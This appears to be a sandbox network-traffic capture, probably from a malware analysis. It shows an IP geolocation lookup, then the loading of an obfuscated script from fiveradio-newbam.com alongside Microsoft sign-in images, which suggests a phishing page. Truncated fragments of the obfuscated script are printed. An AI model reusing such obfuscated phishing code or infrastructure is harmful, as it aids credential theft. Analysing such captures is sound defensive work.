2024-06-28 07:25:51 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:25:58 UTC	492	OUT	GET /jsnom.js HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:25:58 UTC	792	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:25:58 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 1425955 Connection: close X-Powered-By: Express Access-Control-Allow-Origin: * Cache-Control: public, max-age=14400 Last-Modified: Tue, 25 Jun 2024 18:49:02 GMT ETag: W/"15c223-19050badf2f" CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyJTB6D9iyzDZCb%2BV4Hz0mCkLl2lXol%2B1EJCqXi3ixKA%2BuQFgX1MgDp%2Boi9SFrquvrUr8q392fRdwZyrkU%2BBWrEi9jEDmu%2FrU18p0ccYOdFTvonAjxCxgvhzfgzuFl%2BKqcmcXY%2F0Zg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89abf2272a7a425d-EWR alt-svc: h3=":443"; ma=86400
2024-06-28 07:25:58 UTC	577	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 39 34 64 28 5f 30 78 34 63 39 62 63 63 2c 20 5f 30 78 31 31 36 31 37 32 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 35 62 37 34 30 31 20 3d 20 5f 30 78 34 66 62 30 28 29 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 32 39 34 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 36 37 35 36 38 2c 20 5f 30 78 32 32 36 33 66 34 29 20 7b 0a 20 20 20 20 20 20 20 20 5f 30 78 32 36 37 35 36 38 20 3d 20 5f 30 78 32 36 37 35 36 38 20 2d 20 28 2d 30 78 31 20 2a 20 2d 30 78 38 34 31 20 2b 20 30 78 31 39 35 39 20 2b 20 2d 30 78 32 35 20 2a 20 30 78 65 33 29 3b 0a 20 20 20 20 20 20 20 20 6c 65 74 20 5f 30 78 33 66 37 61 34 62 20 3d 20 5f 30 78 35 62 37 34 30 31 5b 5f 30 78 32 36 37 35 36 38 5d 3b 0a 20 20 20 20 20 20 20 20 Data Ascii: function _0x294d(_0x4c9bcc, _0x116172) { const _0x5b7401 = _0x4fb0(); return _0x294d = function(_0x267568, _0x2263f4) { _0x267568 = _0x267568 - (-0x1 * -0x841 + 0x1959 + -0x25 * 0xe3); let _0x3f7a4b = _0x5b7401[_0x267568];
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 36 37 20 2b 20 2d 30 78 31 34 32 20 2a 20 2d 30 78 35 20 2b 20 2d 30 78 36 31 39 20 2a 20 30 78 37 29 29 20 2b 20 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 32 33 33 33 64 28 30 78 32 38 36 29 29 20 2f 20 28 2d 30 78 31 20 2a 20 2d 30 78 32 33 30 64 20 2b 20 30 78 36 64 64 20 2a 20 30 78 35 20 2b 20 2d 30 78 33 35 20 2a 20 30 78 31 34 66 29 20 2b 20 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 32 33 33 33 64 28 30 78 31 35 62 37 29 29 20 2f 20 28 30 78 32 20 2a 20 30 78 39 30 61 20 2b 20 30 78 35 62 20 2a 20 30 78 36 35 20 2b 20 30 78 35 66 66 20 2a 20 2d 30 78 39 29 20 2a 20 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 32 33 33 33 64 28 30 78 32 36 34 39 29 29 20 2f 20 28 30 78 31 37 20 2a 20 30 78 31 37 66 20 2b 20 2d 30 78 32 34 65 34 20 2b 20 30 78 32 38 30 Data Ascii: 67 + -0x142 * -0x5 + -0x619 * 0x7)) + -parseInt(_0x12333d(0x286)) / (-0x1 * -0x230d + 0x6dd * 0x5 + -0x35 * 0x14f) + -parseInt(_0x12333d(0x15b7)) / (0x2 * 0x90a + 0x5b * 0x65 + 0x5ff * -0x9) * (parseInt(_0x12333d(0x2649)) / (0x17 * 0x17f + -0x24e4 + 0x280
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 47 74 65 64 73 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 32 34 33 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 66 5a 4e 69 4f 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 61 35 36 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4c 6a 69 79 44 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 34 61 34 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 76 4a 79 43 4a 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 32 35 32 35 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 46 65 46 79 4b 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 33 38 36 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 50 47 50 67 56 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 36 62 63 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 64 6b Data Ascii: 'Gteds': _0xb3c27b(0x2433), 'fZNiO': _0xb3c27b(0x1a56), 'LjiyD': _0xb3c27b(0x14a4), 'vJyCJ': _0xb3c27b(0x2525), 'FeFyK': _0xb3c27b(0x1386), 'PGPgV': _0xb3c27b(0x6bc), 'dk
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 6c 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 63 38 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 65 49 6f 49 46 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 33 31 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 53 68 47 4a 58 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 39 37 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 50 4f 58 41 47 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 62 35 30 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 50 64 71 50 6d 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 65 65 37 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 6c 4a 43 63 6e 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 33 34 66 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 6e 43 48 66 4e 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 37 33 Data Ascii: l': _0xb3c27b(0x1c83), 'eIoIF': _0xb3c27b(0x313), 'ShGJX': _0xb3c27b(0x1973), 'POXAG': _0xb3c27b(0xb50), 'PdqPm': _0xb3c27b(0x1ee7), 'lJCcn': _0xb3c27b(0x34f), 'nCHfN': _0xb3c27b(0x73
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 27 65 48 51 76 64 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 66 34 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4d 45 74 6a 4b 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 32 36 30 36 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 71 51 6b 48 74 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 39 39 38 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4c 73 66 48 79 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 39 34 63 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4d 46 44 6f 5a 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 65 62 62 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4b 6c 55 4c 48 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 34 37 35 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4b 46 75 5a Data Ascii: 'eHQvd': _0xb3c27b(0x1f4), 'MEtjK': _0xb3c27b(0x2606), 'qQkHt': _0xb3c27b(0x1998), 'LsfHy': _0xb3c27b(0x194c), 'MFDoZ': _0xb3c27b(0x1ebb), 'KlULH': _0xb3c27b(0x1475), 'KFuZ
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 5f 30 78 62 33 63 32 37 62 28 30 78 35 37 36 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 75 6d 41 77 7a 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 34 62 35 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 50 6b 57 4d 46 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 65 38 39 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 70 55 71 43 7a 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 32 33 65 62 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 61 51 51 4a 65 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 63 62 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 41 41 64 4b 49 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 35 35 61 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 67 73 7a 41 74 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 32 36 62 29 2c 0a 20 20 Data Ascii: _0xb3c27b(0x576), 'umAwz': _0xb3c27b(0x4b5), 'PkWMF': _0xb3c27b(0xe89), 'pUqCz': _0xb3c27b(0x23eb), 'aQQJe': _0xb3c27b(0xcb), 'AAdKI': _0xb3c27b(0x55a), 'gszAt': _0xb3c27b(0x126b),
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 62 33 63 32 37 62 28 30 78 32 33 30 39 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 68 4a 4d 49 48 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 65 34 34 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 6d 65 6b 4a 6d 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 31 61 64 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 7a 6c 4f 77 55 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 62 65 34 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 64 79 4f 72 63 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 32 66 62 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 42 72 61 79 79 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 35 33 37 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 68 78 73 46 64 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 39 31 39 29 2c 0a 20 20 Data Ascii: b3c27b(0x2309), 'hJMIH': _0xb3c27b(0xe44), 'mekJm': _0xb3c27b(0x11ad), 'zlOwU': _0xb3c27b(0x1be4), 'dyOrc': _0xb3c27b(0x2fb), 'Brayy': _0xb3c27b(0x1537), 'hxsFd': _0xb3c27b(0x919),
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 27 64 6b 78 77 77 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 61 35 65 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 62 6a 72 46 58 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 66 33 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 6e 42 64 43 41 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 35 34 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 6f 45 76 50 6c 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 36 31 39 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 69 5a 64 79 7a 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 31 34 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4f 67 62 57 4e 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 37 34 65 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 77 6e 43 6b Data Ascii: 'dkxww': _0xb3c27b(0x1a5e), 'bjrFX': _0xb3c27b(0xf33), 'nBdCA': _0xb3c27b(0x1543), 'oEvPl': _0xb3c27b(0x619), 'iZdyz': _0xb3c27b(0x1143), 'OgbWN': _0xb3c27b(0x174e), 'wnCk
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 30 78 62 33 63 32 37 62 28 30 78 32 31 62 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 43 47 6a 6a 46 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 37 34 38 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 65 70 63 4a 66 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 33 39 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 6f 73 44 4d 6f 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 34 62 36 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 57 57 75 55 74 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 39 37 65 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 70 4b 77 72 76 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 31 34 34 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 7a 51 69 50 70 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 32 31 38 30 29 2c 0a Data Ascii: 0xb3c27b(0x21b3), 'CGjjF': _0xb3c27b(0x748), 'epcJf': _0xb3c27b(0x139), 'osDMo': _0xb3c27b(0x4b6), 'WWuUt': _0xb3c27b(0x197e), 'pKwrv': _0xb3c27b(0x1144), 'zQiPp': _0xb3c27b(0x2180),
2024-06-28 07:25:58 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 27 6c 7a 75 41 6f 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 61 34 64 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 52 41 52 71 4f 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 32 30 31 36 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 68 73 6c 4a 7a 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 32 33 31 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 76 43 74 64 7a 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 32 31 65 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4e 49 79 45 78 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 64 65 38 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 49 6f 7a 51 74 27 3a 20 5f 30 78 62 33 63 32 37 62 28 30 78 31 63 32 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 55 64 48 61 4a 27 Data Ascii: 'lzuAo': _0xb3c27b(0x1a4d), 'RARqO': _0xb3c27b(0x2016), 'hslJz': _0xb3c27b(0x1231), 'vCtdz': _0xb3c27b(0x21e3), 'NIyEx': _0xb3c27b(0x1de8), 'IozQt': _0xb3c27b(0x1c23), 'UdHaJ'

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:25:58 UTC	510	OUT	GET /4.6.0/socket.io.min.js HTTP/1.1 Host: cdn.socket.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: null sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:25:58 UTC	703	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Content-Length: 45806 Connection: close Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000, immutable Content-Disposition: inline; filename="socket.io.min.js" Date: Fri, 05 Jan 2024 09:12:45 GMT ETag: "80f5b8c6a9eeac15de93e5a112036a06" Server: Vercel Strict-Transport-Security: max-age=63072000 X-Vercel-Cache: HIT X-Vercel-Id: fra1::kcxpj-1704445965394-d209ffeb73cf X-Cache: Hit from cloudfront Via: 1.1 af3799c72ed879abb7633a4c3e57502e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P8 X-Amz-Cf-Id: 27LR8nVTjy_Ba1-pEiu0D0wmslS2S1CZl_-e5zZR4Mren5ImKGadsw== Age: 15231658
2024-06-28 07:25:58 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 Data Ascii: /! Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
2024-06-28 07:25:58 UTC	16384	IN	Data Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
2024-06-28 07:25:58 UTC	13038	IN	Data Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68 Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:01 UTC	618	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:01 UTC	785	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:26:01 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:48 GMT ETag: 0x8DB5C3F4911527F x-ms-request-id: 3712c478-f01e-004d-3f7c-c5e994000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240628T072601Z-157bfc59976pc7blt2fuhzp2h800000006z000000000499w x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-06-28 07:26:01 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:01 UTC	638	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:01 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:26:01 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F499A9B99 x-ms-request-id: 1837fb6a-b01e-0075-61ce-c79094000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240628T072601Z-157bfc599769bbcfn5fpqda8ws0000000330000000009fax x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-06-28 07:26:01 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 